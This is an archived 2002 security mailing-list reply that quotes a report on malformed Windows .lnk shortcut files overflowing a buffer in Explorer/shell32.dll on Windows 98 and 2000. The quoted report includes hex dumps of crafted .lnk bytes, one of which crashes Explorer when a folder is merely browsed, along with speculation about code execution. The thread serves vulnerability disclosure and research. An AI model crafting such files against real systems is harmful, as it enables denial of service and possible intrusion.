Hello, I've done some playing around with malformed .lnk files under Windows 2000 and found similar results; nothing published yet. I found it was similar to a problem USSR Labs reported some time ago with Windows NT but was in relation to SERVU FTP ... upload the malformed .lnk file execute a list and crash/overflow. Also discussed at, http://archives.neohapsis.com/archives/vuln-dev/2000-q1/0568.html Cyberiad On Wed, 26 Jun 2002, Brett Moore wrote: > It seems that the handling of .lnk files has a few problems. I have tested > on both win98 and win2000 sp2 server. > > Can anyone test further. Note that the actions taken by these .lnk files has > the possiblity of causing damage to a system and should not be tested on an > essential server :-) > > ------------------------------------------------------------------- > 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20 2 +,RG New > 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78 Text Document.tx > 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF t NEWTEX~3.TXT > FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00 > 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 > 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 > ------------------------------------------------------------------- > > This causes FF FF to be loaded into a register used to control the length of > data copied. Usually causes an error when right clicking on the file in > explorer. Sometimes it is required > to select properties. Errors seen include unable to read, unable to write. > Since we are controlling the length of the data copies these errors are self > explanatory. > > Would seeme that explorer/shell32.dll is copying to much data when reading > the filename?. Ok so > this causes the read/write errors and halts progress. > > But if we substitute valid values such as 01 01 (CC CC) then the buffer > still gets overflowed but we bypass this error and our corrupt values get > further down in the program. > > ------------------------------------------------------------------- > 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20 2 +,RG New > 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78 Text Document.tx > 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC t NEWTEX~3.TXT¦¦ > CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0 ¦¦¤¤¤¤¤¤________ > AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ > AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ > ------------------------------------------------------------------- > > This one does not cause the read/write errors but causes a DoS in explorer > just by browsing to the folder holding the file. > > This is more interesting, but involves tracking a lot of assembler code. > Worst result would be some sort of code executed just by browsing a folder. > Virus related perhaps. > > Any feedback on results or further research into this problem would be > appreciated. > > Notes: > Do not save to your desktop. > Rename the file to .lnk > This is the win98 file. You can easily modify a 2000 or other lnk file as > detailed above. > > > Brett Moore > >
This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 21:16:50 PDT